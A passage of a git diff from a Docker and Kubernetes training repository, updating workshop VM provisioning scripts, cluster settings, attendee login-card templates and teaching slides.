system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
+else:
+system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
+# Record the IPV4 and name of the first node
+system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
+system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))

FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
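The convenience file created above turns "am I the first node?" into a plain shell predicate: the symlink points at `/bin/true` (exit 0) on the first node and `/bin/false` (exit 1) everywhere else, so it composes directly with `if`, exactly as the `workshopctl` hunks earlier in this diff use it:

```bash
# Runs only on the node whose symlink targets /bin/true.
if i_am_first_node; then
    echo "running first-node-only setup"
fi
```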
@@ -1,8 +1,11 @@
# Number of VMs per cluster
clustersize: 1

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: dmuc

# Jinja2 template to use to generate ready-to-cut cards
-cards_template: enix.html
+cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
@@ -18,9 +21,8 @@ paper_margin: 0.2in
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training
prepare-vms/settings/admin-kubenet.yaml (new file, 28 lines)
@@ -0,0 +1,28 @@
# Number of VMs per cluster
clustersize: 3

# The hostname of each node will be clusterprefix + a number
clusterprefix: kubenet

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training
prepare-vms/settings/admin-kuberouter.yaml (new file, 28 lines)
@@ -0,0 +1,28 @@
# Number of VMs per cluster
clustersize: 3

# The hostname of each node will be clusterprefix + a number
clusterprefix: kuberouter

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training
prepare-vms/settings/admin-test.yaml (new file, 28 lines)
@@ -0,0 +1,28 @@
# Number of VMs per cluster
clustersize: 3

# The hostname of each node will be clusterprefix + a number
clusterprefix: test

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training
@@ -1,5 +1,8 @@
# Number of VMs per cluster
clustersize: 5

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv
@@ -3,6 +3,9 @@
# Number of VMs per cluster
clustersize: 5

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -20,7 +23,7 @@ paper_margin: 0.2in
engine_version: test

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.18.0
+compose_version: 1.24.1
machine_version: 0.13.0

# Password used to connect with the "docker user"
@@ -3,6 +3,9 @@
# Number of VMs per cluster
clustersize: 1

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -20,7 +23,7 @@ paper_margin: 0.2in
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.24.1
machine_version: 0.15.0

# Password used to connect with the "docker user"
@@ -1,11 +1,14 @@
# Number of VMs per cluster
clustersize: 4

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
-cards_template: jerome.html
+cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
+paper_size: Letter

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
@@ -18,7 +21,7 @@ paper_margin: 0.2in
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
@@ -3,8 +3,11 @@
# Number of VMs per cluster
clustersize: 3

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
-cards_template: kube101.html
+cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
@@ -20,7 +23,7 @@ paper_margin: 0.2in
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
@@ -3,6 +3,9 @@
# Number of VMs per cluster
clustersize: 3

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -20,7 +23,7 @@ paper_margin: 0.2in
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.24.1
machine_version: 0.15.0

# Password used to connect with the "docker user"
prepare-vms/setup-admin-clusters.sh (new executable file, 66 lines)
@@ -0,0 +1,66 @@
#!/bin/sh
set -e

export AWS_INSTANCE_TYPE=t3a.small

INFRA=infra/aws-us-west-2

STUDENTS=2

PREFIX=$(date +%Y-%m-%d-%H-%M)

SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $STUDENTS

./workshopctl deploy $TAG
./workshopctl disabledocker $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG

SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))

./workshopctl disableaddrchecks $TAG
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG

SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))

./workshopctl disableaddrchecks $TAG
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG

#INFRA=infra/aws-us-west-1

export AWS_INSTANCE_TYPE=t3a.medium

SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))

./workshopctl deploy $TAG
./workshopctl kube $TAG 1.13.5
./workshopctl cards $TAG
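A hypothetical invocation of this script (assuming AWS credentials are configured and the `infra/aws-us-west-2` file exists in the checkout):

```bash
cd prepare-vms
./setup-admin-clusters.sh   # provisions the dmuc, kubenet, kuberouter, and test clusters
```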
@@ -1,29 +1,88 @@
{# Feel free to customize or override anything in there! #}
-{%- set url = "http://container.training/" -%}
-{%- set pagesize = 12 -%}
-{%- if clustersize == 1 -%}
-{%- set workshop_name = "Docker workshop" -%}
-{%- set cluster_or_machine = "machine" -%}
-{%- set this_or_each = "this" -%}
-{%- set machine_is_or_machines_are = "machine is" -%}
-{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-{%- set workshop_name = "orchestration workshop" -%}
-{%- set cluster_or_machine = "cluster" -%}
-{%- set this_or_each = "each" -%}
-{%- set machine_is_or_machines_are = "machines are" -%}
-{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-{%- set image_src = image_src_swarm -%}

+{%- set url = "http://FIXME.container.training/" -%}
+{%- set pagesize = 9 -%}
+{%- set lang = "en" -%}
+{%- set event = "training session" -%}
+{%- set backside = False -%}
+{%- set image = "kube" -%}
+{%- set clusternumber = 100 -%}

+{%- set image_src = {
+    "docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
+    "swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
+    "kube": "https://avatars1.githubusercontent.com/u/13629408",
+    "enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
+}[image] -%}
+{%- if lang == "en" and clustersize == 1 -%}
+{%- set intro -%}
+Here is the connection information to your very own
+machine for this {{ event }}.
+You can connect to this VM with any SSH client.
+{%- endset -%}
+{%- set listhead -%}
+Your machine is:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clustersize != 1 -%}
+{%- set intro -%}
+Here is the connection information to your very own
+cluster for this {{ event }}.
+You can connect to each VM with any SSH client.
+{%- endset -%}
+{%- set listhead -%}
+Your machines are:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize == 1 -%}
+{%- set intro -%}
+Voici les informations permettant de se connecter à votre
+machine pour cette formation.
+Vous pouvez vous connecter à cette machine virtuelle
+avec n'importe quel client SSH.
+{%- endset -%}
+{%- set listhead -%}
+Adresse IP:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clusterprefix != "node" -%}
+{%- set intro -%}
+Here is the connection information for the
+<strong>{{ clusterprefix }}</strong> environment.
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize != 1 -%}
+{%- set intro -%}
+Voici les informations permettant de se connecter à votre
+cluster pour cette formation.
+Vous pouvez vous connecter à chaque machine virtuelle
+avec n'importe quel client SSH.
+{%- endset -%}
+{%- set listhead -%}
+Adresses IP:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" -%}
+{%- set slides_are_at -%}
+You can find the slides at:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" -%}
+{%- set slides_are_at -%}
+Le support de formation est à l'adresse suivante :
+{%- endset -%}
+{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');

body, table {
margin: 0;
padding: 0;
line-height: 1em;
-font-size: 14px;
+font-size: 15px;
font-family: 'Slabo 27px';
}

table {
@@ -37,24 +96,54 @@ table {
div {
float: left;
border: 1px dotted black;
{% if backside %}
height: 31%;
{% endif %}
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
/*
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
*/
/**/
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
/**/
}

p {
margin: 0.4em 0 0.4em 0;
}

div.back {
border: 1px dotted white;
}

div.back p {
margin: 0.5em 1em 0 1em;
}

img {
height: 4em;
float: right;
-margin-right: -0.4em;
+margin-right: -0.2em;
}

/*
img.enix {
height: 4.0em;
margin-top: 0.4em;
}

img.kube {
height: 4.2em;
margin-top: 1.7em;
}
*/

.logpass {
font-family: monospace;
font-weight: bold;
@@ -69,19 +158,15 @@ img {
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

-<p>
-Here is the connection information to your very own
-{{ cluster_or_machine }} for this {{ workshop_name }}.
-You can connect to {{ this_or_each }} VM with any SSH client.
-</p>
+<p>{{ intro }}</p>
<p>
<img src="{{ image_src }}" />
<table>
+{% if clusternumber != None %}
+<tr><td>cluster:</td></tr>
+<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
+{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
@@ -90,17 +175,44 @@ img {

</p>
<p>
-Your {{ machine_is_or_machines_are }}:
+{{ listhead }}
<table>
{% for node in cluster %}
-<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+<tr>
+<td>{{ clusterprefix }}{{ loop.index }}:</td>
+<td>{{ node }}</td>
+</tr>
{% endfor %}
</table>
</p>
-<p>You can find the slides at:
+<p>
+{{ slides_are_at }}
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
+{% if backside %}
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this at the workshop
"Getting Started With Kubernetes and Container Orchestration"
during QCON London (March 2019).</p>
<p>If you liked that workshop,
I can train your team or organization
on Docker, container, and Kubernetes,
with curriculums of 1 to 5 days.
</p>
<p>Interested? Contact me at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
+{% endif %}
{% endif %}
{% endfor %}
</body>
</html>
@@ -1,121 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://FIXME.container.training" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine virtuelle" -%}
{%- set this_or_each = "cette" -%}
{%- set plural = "" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "chaque" -%}
{%- set plural = "s" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');

body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
}

table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}

div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
}

p {
margin: 0.4em 0 0.4em 0;
}

img {
height: 4em;
float: right;
margin-right: -0.3em;
}

img.enix {
height: 4.0em;
margin-top: 0.4em;
}

img.kube {
height: 4.2em;
margin-top: 1.7em;
}

.logpass {
font-family: monospace;
font-weight: bold;
}

.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
Voici les informations permettant de se connecter à votre
{{ cluster_or_machine }} pour cette formation.
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
avec n'importe quel client SSH.
</p>
<p>
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
<table>
<tr><td>identifiant:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>mot de passe:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Adresse{{ plural }} IP :
<!--<img class="kube" src="{{ image_src }}" />-->
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>Le support de formation est à l'adresse suivante :
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -1,134 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://qconuk2019.container.training/" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
body, table {
margin: 0;
padding: 0;
line-height: 1.0em;
font-size: 15px;
font-family: 'Slabo 27px';
}

table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}

div {
float: left;
border: 1px dotted black;
height: 31%;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
}

div.back {
border: 1px dotted white;
}

div.back p {
margin: 0.5em 1em 0 1em;
}

p {
margin: 0.4em 0 0.8em 0;
}

img {
height: 5em;
float: right;
margin-right: 1em;
}

.logpass {
font-family: monospace;
font-weight: bold;
}

.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
<div>

<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this at the workshop
"Getting Started With Kubernetes and Container Orchestration"
during QCON London (March 2019).</p>
<p>If you liked that workshop,
I can train your team or organization
on Docker, container, and Kubernetes,
with curriculums of 1 to 5 days.
</p>
<p>Interested? Contact me at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endfor %}
</body>
</html>
@@ -1,106 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}

table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}

div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}

p {
margin: 0.4em 0 0.4em 0;
}

img {
height: 4em;
float: right;
margin-right: -0.4em;
}

.logpass {
font-family: monospace;
font-weight: bold;
}

.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -1,4 +1,4 @@
-FROM alpine:3.9
-RUN apk add --no-cache entr py-pip git
+FROM alpine:3.11
+RUN apk add --no-cache entr py3-pip git zip
COPY requirements.txt .
-RUN pip install -r requirements.txt
+RUN pip3 install -r requirements.txt
@@ -1 +1,7 @@
/ /kube-fullday.yml.html 200!
+# Uncomment and/or edit one of the following lines if necessary.
+#/ /kube-halfday.yml.html 200
+#/ /kube-fullday.yml.html 200
+#/ /kube-twodays.yml.html 200

+# And this allows doing "git clone https://container.training".
+/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
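As the comment above says, that last rule proxies Git's initial ref discovery to GitHub, which makes the site's own domain usable as a clone URL:

```bash
git clone https://container.training
```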
slides/assignments/TODO.txt (new file, 34 lines)
@@ -0,0 +1,34 @@
# Our sample application

No assignment

# Kubernetes concepts

Do we want some kind of multiple-choice quiz?

# First contact with kubectl

Start some pre-defined image and check its logs
(Do we want to make a custom "mystery image" that shows a message
and then sleeps forever?)

Start another one (to make sure they understand that they need
to specify a unique name each time)

Provide as many ways as you can to figure out on which node
these pods are running (even if you only have one node).

# Exposing containers

Start a container running the official tomcat image.
Expose it.
Connect to it.

# Shipping apps

(We need a few images for a demo app other than DockerCoins?)

Start the components of the app.
Expose what needs to be exposed.
Connect to the app and check that it works.
slides/assignments/setup.md (new file, 105 lines)
@@ -0,0 +1,105 @@
## Assignment: get Kubernetes

- In order to do the other assignments, we need a Kubernetes cluster

- Here are some *free* options:

  - Docker Desktop

  - Minikube

  - Online sandbox like Katacoda

- You can also get a managed cluster (but this costs some money)

---

## Recommendation 1: Docker Desktop

- If you are already using Docker Desktop, use it for Kubernetes

- If you are running macOS, [install Docker Desktop](https://docs.docker.com/docker-for-mac/install/)

  - you will need a post-2010 Mac

  - you will need macOS Sierra 10.12 or later

- If you are running Windows 10, [install Docker Desktop](https://docs.docker.com/docker-for-windows/install/)

  - you will need 64-bit Windows 10 Pro, Enterprise, or Education

  - virtualization needs to be enabled in your BIOS

- Then [enable Kubernetes](https://blog.docker.com/2018/07/kubernetes-is-now-available-in-docker-desktop-stable-channel/) if it's not already on

---

## Recommendation 2: Minikube

- In some scenarios, you can't use Docker Desktop:

  - if you run Linux

  - if you are running an unsupported version of Windows

- You might also want to install Minikube for other reasons

  (there are more tutorials and instructions out there for Minikube)

- Minikube installation is a bit more complex

  (depending on which hypervisor and OS you are using)

---

## Minikube installation details

- Minikube typically runs in a local virtual machine

- It supports multiple hypervisors:

  - VirtualBox (Linux, Mac, Windows)

  - HyperV (Windows)

  - HyperKit, VMware (Mac)

  - KVM (Linux)

- Check the [documentation](https://kubernetes.io/docs/tasks/tools/install-minikube/) for details relevant to your setup

---

## Recommendation 3: learning platform

- Sometimes, you can't even install Minikube

  (computer locked by IT policies; insufficient resources...)

- In that case, you can use a platform like:

  - Katacoda

  - Play-with-Kubernetes

---

## Recommendation 4: hosted cluster

- You can also get your own hosted cluster

- This will cost a little bit of money

  (unless you have free hosting credits)

- Setup will vary depending on the provider, platform, etc.

---

class: assignment

- Make sure that you have a Kubernetes cluster

- You should be able to run `kubectl get nodes` and see a list of nodes

- These nodes should be in `Ready` state
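A quick way to verify those last two points, as a sketch (`kubectl wait` is available in any reasonably recent kubectl):

```bash
kubectl get nodes
# Block until every node reports Ready, or fail after two minutes:
kubectl wait --for=condition=Ready nodes --all --timeout=120s
```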
@@ -14,7 +14,6 @@ once)
./appendcheck.py $YAML.html
done
fi
zip -qr slides.zip . && echo "Created slides.zip archive."
;;

forever)
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
* Ad-hoc deployments can use a master-less discovery protocol
like avahi to register and discover services.
* It is also possible to do one-shot reconfiguration of the
-ambassadors. It is slightly less dynamic but has much less
+ambassadors. It is slightly less dynamic but has far fewer
requirements.
* Ambassadors can be used in addition to, or instead of, overlay networks.
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.

---

-## Section summary
+## Some popular service meshes

-We've learned how to:
+... And related projects:

-* Understand the ambassador pattern and what it is used for (service portability).
+* [Consul Connect](https://www.consul.io/docs/connect/index.html)
+  <br/>
+  Transparently secures service-to-service connections with mTLS.

-For more information about the ambassador pattern, including demos on Swarm and ECS:

-* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)

-* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)

-Some services meshes and related projects:
+* [Gloo](https://gloo.solo.io/)
+  <br/>
+  API gateway that can interconnect applications on VMs, containers, and serverless.

+* [Istio](https://istio.io/)
+  <br/>
+  A popular service mesh.

+* [Linkerd](https://linkerd.io/)
+  <br/>
+  Another popular service mesh.

-* [Gloo](https://gloo.solo.io/)
---

+## Learning more about service meshes

+A few blog posts about service meshes:

+* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
+  <br/>
+  Provides historical context: how did we do before service meshes were invented?

+* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
+  <br/>
+  Explains the purpose of service meshes. Illustrates some NGINX features.

+* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
+  <br/>
+  Includes high-level overview and definitions.

+* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
+  <br/>
+  Includes a step-by-step demo of Linkerd.

+And a video:

+* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc

* Allows arbitrary customization and complex configuration files.

-* Requires to write a configuration file. (Obviously!)
+* Requires writing a configuration file. (Obviously!)

-* Requires to build an image to start the service.
+* Requires building an image to start the service.

-* Requires to rebuild the image to reconfigure the service.
+* Requires rebuilding the image to reconfigure the service.

-* Requires to rebuild the image to upgrade the service.
+* Requires rebuilding the image to upgrade the service.

* Configured images can be stored in registries.

@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp

* Allows arbitrary customization and complex configuration files.

-* Requires to create a volume for each different configuration.
+* Requires creating a volume for each different configuration.

* Services with identical configurations can use the same volume.

-* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
+* Doesn't require building / rebuilding an image when upgrading / reconfiguring.

* Configuration can be generated or edited through another container.

@@ -198,4 +198,4 @@ E.g.:

- read the secret on stdin when the service starts,

- pass the secret using an API endpoint.
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
The `stop` and `kill` commands can take multiple container IDs.

Those containers will be terminated immediately (without
-the 10 seconds delay).
+the 10-second delay).

Let's check that our containers don't show up anymore:
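(A plausible continuation of that slide, shown here as a sketch; `docker ps` and the `--time` flag are standard CLI features:)

```bash
# No containers should be listed now.
docker ps
# For reference, the grace period of `docker stop` is tunable:
docker stop --time 30 <container-id>
```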
@@ -222,16 +222,16 @@ CMD ["hello world"]
Let's build it:

```bash
-$ docker build -t figlet .
+$ docker build -t myfiglet .
...
Successfully built 6e0b6a048a07
-Successfully tagged figlet:latest
+Successfully tagged myfiglet:latest
```

Run it without parameters:

```bash
-$ docker run figlet
+$ docker run myfiglet
(figlet prints "hello world" here in large ASCII-art letters)
@@ -246,7 +246,7 @@ $ docker run figlet
Now let's pass extra arguments to the image.

```bash
-$ docker run figlet hola mundo
+$ docker run myfiglet hola mundo
(figlet prints "hola mundo" here in large ASCII-art letters)
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.

What if we want to run a shell in our container?

-We cannot just do `docker run figlet bash` because
+We cannot just do `docker run myfiglet bash` because
that would just tell figlet to display the word "bash."

We use the `--entrypoint` parameter:

```bash
-$ docker run -it --entrypoint bash figlet
+$ docker run -it --entrypoint bash myfiglet
root@6027e44e2955:/#
```
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...

